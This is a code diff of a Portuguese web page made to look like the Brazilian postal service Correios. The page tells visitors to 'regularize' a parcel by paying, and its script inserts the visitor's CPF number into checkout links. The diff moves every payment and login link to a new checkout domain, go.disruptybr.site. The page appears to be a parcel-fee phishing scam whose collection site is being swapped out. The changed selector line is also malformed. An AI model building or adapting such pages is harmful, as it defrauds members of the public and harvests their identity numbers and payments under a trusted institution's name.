--- a/encomenda/index.html
+++ b/encomenda/index.html
@@ -35,7 +35,7 @@
             const nomeFormatado = formatarNome(nomeDecodificado);
 
             // Evita codificar novamente se já está correto
-            const checkoutLinks = document.querySelectorAll('a[href*="zippify.com.br"]');
+            const checkoutLinks = document.querySelectorAll('a[href*="go.disruptybr.site]');
             checkoutLinks.forEach(link => {
                 const novaUrl = new URL(link.href);
                 novaUrl.searchParams.set('document', cpf);
@@ -193,13 +193,13 @@
 </style>
     <nav class="w-100 d-flex align-items-center bg-grey-2 px-3 px-lg-3 py-1 border-bottom border-warning" style="height:48px">
       <div class="ml-0 ml-lg-1 d-flex justify-content-center" style="width:100%">
-        <a href="https://go.zippify.com.br/xapdi" class="py-2">
+        <a href="https://go.disruptybr.site/ywahxkis1b" class="py-2">
           <img src="images/NKhjCtJZ0lgK.png" alt="" height="25">
         </a>
       </div>
 
       <div class="ml-4 d-none d-lg-block " style="width:150px">
-        <a href="https://go.zippify.com.br/xapdi" class="py-1 text-blue-dark border-left border-secondary px-3 text-decoration-none">
+        <a href="https://go.disruptybr.site/ywahxkis1b" class="py-1 text-blue-dark border-left border-secondary px-3 text-decoration-none">
           <img src="images/OzcwVbf11Dwo.svg" alt="Correios" width="31">
 
           <span class="ml-1">Entrar</span>
@@ -243,7 +243,7 @@
 
     </section>
     <div style="padding: 0px 30px 0px 30px;">
-    <a href="https://go.zippify.com.br/xapdi" class="btn btn-primary" style="font-size:13px;width: 100%;">REGULARIZAR MINHA ENCOMENDA</a>
+    <a href="https://go.disruptybr.site/ywahxkis1b" class="btn btn-primary" style="font-size:13px;width: 100%;">REGULARIZAR MINHA ENCOMENDA</a>
 
     </div>
     
@@ -365,7 +365,7 @@
             </span>
 
             <h5 class="mt-1 text-blue-dark font-size-13 font-weight-700 p-0 m-0 flex-wrap">
-              Realize o pagamento: <a href="https://go.zippify.com.br/xapdi" class="text-blue">Efetuar Pagamento</a>
+              Realize o pagamento: <a href="https://go.disruptybr.site/ywahxkis1b" class="text-blue">Efetuar Pagamento</a>
             </h5>
           </div>
         </li>
